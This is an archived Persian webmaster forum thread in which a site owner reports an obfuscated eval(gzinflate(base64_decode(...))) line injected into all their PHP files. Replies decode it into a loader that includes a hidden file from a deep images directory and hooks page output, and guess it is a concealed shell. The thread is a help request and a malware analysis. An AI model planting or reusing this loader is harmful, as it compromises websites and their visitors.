Train

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : درخواست راهنمايی برای خذف كد eval gzinflate base64


kingsky7
07-12-2011, 04:11 PM
از ديروز به ابتدای تمامي فايلهای php موجود برروی هاستم اين كد اضافه شده است:

<?php /*c739a8f45c37080f112a7affc6b310d6*/ eval(gzinflate(base64_decode('DZVFDuWKAQSP8+fLCzMp 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 kZxQEwboGwZb67z///vvvf/4P')));?>

برای حذف اين كد از كليه فايلهای php بايد چكار كنم؟ بصورت دستی همه رو خذف كنم ! اصلا اين كد چيه كه به يكبار ه همه فايلهای php رو تسخير كرده !!! :o

Milad-Bushehr
07-12-2011, 04:24 PM
شما از سرویس های آشیانه هاست استفاده می کنید؟
محتویات کد:

/*rxzggcrjyqdtqcjyzvyiwlkzqqcjctanntffqjryjhpksqbtb e*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/ebazaarc/public_html/talar/images/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/9c6.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

به مدیر سرور خود اطلاع دهید.

kingsky7
07-12-2011, 04:45 PM
شما از سرویس های آشیانه هاست استفاده می کنید؟
محتویات کد:

/*rxzggcrjyqdtqcjyzvyiwlkzqqcjctanntffqjryjhpksqbtb e*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/ebazaarc/public_html/talar/images/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/cx/9c6.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

به مدیر سرور خود اطلاع دهید.

هاستم رو از اشيانه نگرفتم ولي اگه امكان داره يه توضيح مختصري درباره اينكه اين كد اصلا چي هست و چرا به فايلهاي php اضافه شده بدين ممنون ميشم :17:

ppm
07-12-2011, 07:25 PM
تست نکرم اما احتمالا شل باشه که encode شده به base64 تا آنتی ویروس بهش گیرنده!